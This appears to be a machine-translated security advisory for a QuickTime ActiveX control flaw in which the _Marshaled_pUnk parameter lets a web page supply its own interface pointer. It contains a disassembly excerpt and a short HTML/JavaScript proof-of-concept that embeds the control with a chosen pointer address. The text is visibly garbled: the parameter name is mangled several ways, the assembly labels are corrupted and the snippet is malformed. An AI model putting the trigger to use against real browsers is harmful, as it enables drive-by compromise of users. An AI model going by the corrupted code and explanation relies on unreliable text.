QuickTime QTPlugin. ocx control _ delealed_punk parameter verification vulnerability and repair

Affected Versions:

Apple QuickTime Player 7.6.7 (1675)

Vulnerability description:

Apple QuickTime is a popular multimedia player. QuickTime ActiveX Control (QTPlugin. ocx) implements IPersistPropertyBag2: Read (1000E330) to process the received param :. text: 1000E330. text: 1000E330; ================== s u B r o u t I N E ====================== =======================================. text: 1000E330. text: 1000E330. text: 1000E330 sub_1000E330 proc near; data xref :. rdata: 1002E0ECo. text: 1000E330 ;. rdata: 1002E86Co. text: 1000E330. text: 1000E330 arg_0 = dword ptr 4. text: 1000E330 arg_4 = dw Ord ptr 8. text: 1000E330 arg_8 = dword ptr 0Ch. text: 1000E330. text: 1000E330 push esi. text: 1000E331 mov esi, [esp + 4 + arg_0]. text: 1000E335 mov ecx, [esi + 84 h]. text: 1000E33B xor eax, eax. text: 1000E33D test ecx, ecx. text: 1000E33F jz short loc_1000E393. text: 1000E341 mov eax, [esp + 4 + arg_8]. text: 1000E345 mov edx, [esp + 4 + arg_4]. text: 1000E349 push eax. text: 1000E34A push edx. text: 1000E34B call sub _ 100031F0 execution stream: sub_10002980 + 27A sub_10002980 + 27A accept:; code xref: sub_10002980 + 264.7 sub_10002980 + 27A; sub_10002980 + 272j sub_10002980 + 27A push offset aType; "type" sub_10002980 + 27F push ebx; lpString1 sub_10002980 + 280 call ebp; lstrcmpiA sub_10002980 + 282 test eax, eax sub_10002980 + 284 jnz short limit sub_10002980 + 286 push edi; lpString sub_10002980 + 287 call ds: lstrlenA sub_1000 2980 + 28D cmp eax, 104 h sub_10002980 + 292 jnb short loc_10002C22 sub_10002980 + 294 push edi; lpString2 sub_10002980 + 295 lea edx, [esi + 83Ch] sub_10002980 + 29B push edx; lpString1 Limit + 29C call ds: lstrcpyA sub_10002980 + 2A2 sub_10002980 + 2A2 limit:; code xref: Limit + 284j Limit + 2A2; sub_10002980 + 292j sub_10002980 + 2A2 push offset limit; "_ financialed_punk" sub_10002 980 + 2A7 push ebx; lpString1 sub_10002980 + 2A8 call ebp; lstrcmpiA sub_10002980 + 2AA test eax, eax release + 2AC jnz short restart sub_10002980 + 2AE push edi sub_10002980 + 2AF call timeout; simple ascii numbers to long routine sub_10002980 + 2B4 add esp, 4 sub_10002980 + 2B7 lea ecx, [esi + 13B8h] sub_10002980 + 2BD push ecx; GMM sub_10002980 + 2BE push offset iid; iid sub_10002980 + 2C3 push eax; PStm sub_10002980 + 2C4 call ds: CoGetInterfaceAndReleaseStream; we have a winner !! Sub_10002980 + 2CA sub_10002980 + 2CA loc_10002C4A:; code xref: sub_10002980 + 2ACj sub_10002980 + 2CA push edi; int QTPlugin. the OCX control checks whether the object's properties contain _ externaled_punk. If yes, it indicates the address from ASCII

Convert to a numeric representation (sub_10001310) for the hash, and then use the generated pointer as the pStm (to which the hash stream points

IStream interface pointer) CoGetInterfaceAndReleaseStream to get the IUnknown pointer (pUnk) of the list set Interface)

In this way, the IStream pointer is controlled.

<* Reference

Http://secunia.com/advisories/41213/

*>Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk!

addr = 354552864; // 0x15220C20 [pUnk]    var obj=  < + object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"+>         +< + PARAM name="_Marshaled_pUnk" value="+addr+" + />         +<+/+object>;

Security suggestions:
Users keep an eye on the manufacturer's Apple homepage to get the latest version: http://www.apple.com